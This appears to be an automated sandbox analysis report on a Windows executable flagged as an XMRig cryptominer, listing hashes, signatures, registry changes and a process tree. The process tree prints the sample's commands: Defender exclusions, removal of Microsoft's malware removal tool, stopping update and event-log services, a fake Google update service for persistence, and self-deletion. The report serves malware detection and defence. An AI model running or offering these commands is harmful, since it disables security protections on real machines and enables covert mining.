Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
23-05-2024 01:28
Static task
static1
Behavioral task
behavioral1
Sample
6d2a89229cb3d9e4a3f60569aa409850_NeikiAnalytics.exe
Resource
win7-20240221-en
General
-
Target
6d2a89229cb3d9e4a3f60569aa409850_NeikiAnalytics.exe
-
Size
5.1MB
-
MD5
6d2a89229cb3d9e4a3f60569aa409850
-
SHA1
11112da50db3919e323978625a6de21a85536990
-
SHA256
f50d1c243dd26214fd8735640089371f4177f6a9ce1c717721893c14f4c2194a
-
SHA512
0ce0db4dc5fc4c6c70191bdafb6f180ba3b8d583db483b1822f1828fd2044ed7c5ca142ab5146b9cf8bdf4cbed807e9ce328fd2e9f1b8341e2d4e72c8dfb6cac
-
SSDEEP
98304:1jnwHesJeZ+jzZoSr0fHqjjOGMuH8G+KVCP5nO6HCLsez3Xdh3pU9YNYIVy:1Ees1RlIfUzMuf+h5NmHH336d
Malware Config
Signatures
-
XMRig Miner payload 9 IoCs
Processes:
resource yara_rule behavioral2/memory/4476-65-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/4476-67-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/4476-70-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/4476-71-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/4476-69-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/4476-68-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/4476-64-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/4476-72-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/4476-73-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepid process 3504 powershell.exe 4460 powershell.exe -
Creates new service(s) 2 TTPs
-
Drops file in Drivers directory 2 IoCs
Processes:
6d2a89229cb3d9e4a3f60569aa409850_NeikiAnalytics.exeupdater.exedescription ioc process File created C:\Windows\system32\drivers\etc\hosts 6d2a89229cb3d9e4a3f60569aa409850_NeikiAnalytics.exe File created C:\Windows\system32\drivers\etc\hosts updater.exe -
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 848 updater.exe -
Processes:
resource yara_rule behavioral2/memory/4476-59-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/4476-65-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/4476-67-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/4476-70-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/4476-71-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/4476-69-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/4476-68-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/4476-63-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/4476-62-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/4476-61-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/4476-64-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/4476-60-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/4476-72-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/4476-73-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Drops file in System32 directory 4 IoCs
Processes:
6d2a89229cb3d9e4a3f60569aa409850_NeikiAnalytics.exepowershell.exeupdater.exedescription ioc process File opened for modification C:\Windows\system32\MRT.exe 6d2a89229cb3d9e4a3f60569aa409850_NeikiAnalytics.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe updater.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
updater.exedescription pid process target process PID 848 set thread context of 2856 848 updater.exe conhost.exe PID 848 set thread context of 4476 848 updater.exe explorer.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 4264 sc.exe 3408 sc.exe 4776 sc.exe 1712 sc.exe 2364 sc.exe 3772 sc.exe 32 sc.exe 3824 sc.exe 3296 sc.exe 3356 sc.exe 4488 sc.exe 2028 sc.exe 1268 sc.exe 5084 sc.exe -
Modifies data under HKEY_USERS 50 IoCs
Processes:
explorer.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
6d2a89229cb3d9e4a3f60569aa409850_NeikiAnalytics.exepowershell.exeupdater.exepowershell.exeexplorer.exepid process 4188 6d2a89229cb3d9e4a3f60569aa409850_NeikiAnalytics.exe 3504 powershell.exe 3504 powershell.exe 4188 6d2a89229cb3d9e4a3f60569aa409850_NeikiAnalytics.exe 4188 6d2a89229cb3d9e4a3f60569aa409850_NeikiAnalytics.exe 4188 6d2a89229cb3d9e4a3f60569aa409850_NeikiAnalytics.exe 4188 6d2a89229cb3d9e4a3f60569aa409850_NeikiAnalytics.exe 4188 6d2a89229cb3d9e4a3f60569aa409850_NeikiAnalytics.exe 4188 6d2a89229cb3d9e4a3f60569aa409850_NeikiAnalytics.exe 4188 6d2a89229cb3d9e4a3f60569aa409850_NeikiAnalytics.exe 4188 6d2a89229cb3d9e4a3f60569aa409850_NeikiAnalytics.exe 4188 6d2a89229cb3d9e4a3f60569aa409850_NeikiAnalytics.exe 4188 6d2a89229cb3d9e4a3f60569aa409850_NeikiAnalytics.exe 4188 6d2a89229cb3d9e4a3f60569aa409850_NeikiAnalytics.exe 4188 6d2a89229cb3d9e4a3f60569aa409850_NeikiAnalytics.exe 4188 6d2a89229cb3d9e4a3f60569aa409850_NeikiAnalytics.exe 4188 6d2a89229cb3d9e4a3f60569aa409850_NeikiAnalytics.exe 4188 6d2a89229cb3d9e4a3f60569aa409850_NeikiAnalytics.exe 848 updater.exe 4460 powershell.exe 4460 powershell.exe 848 updater.exe 848 updater.exe 848 updater.exe 848 updater.exe 848 updater.exe 848 updater.exe 848 updater.exe 848 updater.exe 848 updater.exe 848 updater.exe 848 updater.exe 848 updater.exe 4476 explorer.exe 4476 explorer.exe 4476 explorer.exe 4476 explorer.exe 4476 explorer.exe 4476 explorer.exe 4476 explorer.exe 4476 explorer.exe 4476 explorer.exe 4476 explorer.exe 4476 explorer.exe 4476 explorer.exe 4476 explorer.exe 4476 explorer.exe 4476 explorer.exe 4476 explorer.exe 4476 explorer.exe 4476 explorer.exe 4476 explorer.exe 4476 explorer.exe 4476 explorer.exe 4476 explorer.exe 4476 explorer.exe 4476 explorer.exe 4476 explorer.exe 4476 explorer.exe 4476 explorer.exe 4476 explorer.exe 4476 explorer.exe 4476 explorer.exe 4476 explorer.exe -
Suspicious use of AdjustPrivilegeToken 19 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exeexplorer.exedescription pid process Token: SeDebugPrivilege 3504 powershell.exe Token: SeShutdownPrivilege 3756 powercfg.exe Token: SeCreatePagefilePrivilege 3756 powercfg.exe Token: SeShutdownPrivilege 4528 powercfg.exe Token: SeCreatePagefilePrivilege 4528 powercfg.exe Token: SeShutdownPrivilege 1160 powercfg.exe Token: SeCreatePagefilePrivilege 1160 powercfg.exe Token: SeShutdownPrivilege 4720 powercfg.exe Token: SeCreatePagefilePrivilege 4720 powercfg.exe Token: SeDebugPrivilege 4460 powershell.exe Token: SeShutdownPrivilege 4504 powercfg.exe Token: SeCreatePagefilePrivilege 4504 powercfg.exe Token: SeShutdownPrivilege 5032 powercfg.exe Token: SeCreatePagefilePrivilege 5032 powercfg.exe Token: SeShutdownPrivilege 3504 powercfg.exe Token: SeCreatePagefilePrivilege 3504 powercfg.exe Token: SeShutdownPrivilege 4848 powercfg.exe Token: SeCreatePagefilePrivilege 4848 powercfg.exe Token: SeLockMemoryPrivilege 4476 explorer.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
cmd.execmd.execmd.exeupdater.exedescription pid process target process PID 3820 wrote to memory of 3984 3820 cmd.exe wusa.exe PID 3820 wrote to memory of 3984 3820 cmd.exe wusa.exe PID 1272 wrote to memory of 4768 1272 cmd.exe choice.exe PID 1272 wrote to memory of 4768 1272 cmd.exe choice.exe PID 2840 wrote to memory of 2400 2840 cmd.exe wusa.exe PID 2840 wrote to memory of 2400 2840 cmd.exe wusa.exe PID 848 wrote to memory of 2856 848 updater.exe conhost.exe PID 848 wrote to memory of 2856 848 updater.exe conhost.exe PID 848 wrote to memory of 2856 848 updater.exe conhost.exe PID 848 wrote to memory of 2856 848 updater.exe conhost.exe PID 848 wrote to memory of 2856 848 updater.exe conhost.exe PID 848 wrote to memory of 2856 848 updater.exe conhost.exe PID 848 wrote to memory of 2856 848 updater.exe conhost.exe PID 848 wrote to memory of 2856 848 updater.exe conhost.exe PID 848 wrote to memory of 2856 848 updater.exe conhost.exe PID 848 wrote to memory of 4476 848 updater.exe explorer.exe PID 848 wrote to memory of 4476 848 updater.exe explorer.exe PID 848 wrote to memory of 4476 848 updater.exe explorer.exe PID 848 wrote to memory of 4476 848 updater.exe explorer.exe PID 848 wrote to memory of 4476 848 updater.exe explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\6d2a89229cb3d9e4a3f60569aa409850_NeikiAnalytics.exe"C:\Users\Admin\AppData\Local\Temp\6d2a89229cb3d9e4a3f60569aa409850_NeikiAnalytics.exe"1⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:4188 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3504 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:3820 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:3984
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:3824 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:4488 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2364 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:4264 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:2028 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:1160 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:4528 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:3756 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:4720 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"2⤵
- Launches sc.exe
PID:1268 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"2⤵
- Launches sc.exe
PID:5084 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog2⤵
- Launches sc.exe
PID:3772 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"2⤵
- Launches sc.exe
PID:3408 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\6d2a89229cb3d9e4a3f60569aa409850_NeikiAnalytics.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1272 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:4768
-
C:\ProgramData\Google\Chrome\updater.exeC:\ProgramData\Google\Chrome\updater.exe1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:848 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4460 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:2400
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:3296 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:4776 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:32 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:3356 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:1712 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:5032 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:4504 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:3504 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:4848 -
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:2856
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4476
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.1MB
MD56d2a89229cb3d9e4a3f60569aa409850
SHA111112da50db3919e323978625a6de21a85536990
SHA256f50d1c243dd26214fd8735640089371f4177f6a9ce1c717721893c14f4c2194a
SHA5120ce0db4dc5fc4c6c70191bdafb6f180ba3b8d583db483b1822f1828fd2044ed7c5ca142ab5146b9cf8bdf4cbed807e9ce328fd2e9f1b8341e2d4e72c8dfb6cac
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD52d29fd3ae57f422e2b2121141dc82253
SHA1c2464c857779c0ab4f5e766f5028fcc651a6c6b7
SHA25680a60d7ec533d820de20bcedeb41319e7b1def548b6ea73ddbd69455bac4e7a4
SHA512077a5c554663be7b71f181d961f5c98c732bc296dc015ffee30768a648bee3aad62c39c352cf2947432be19519906aeac7dfaf2557d309bb460732abb7fdbc68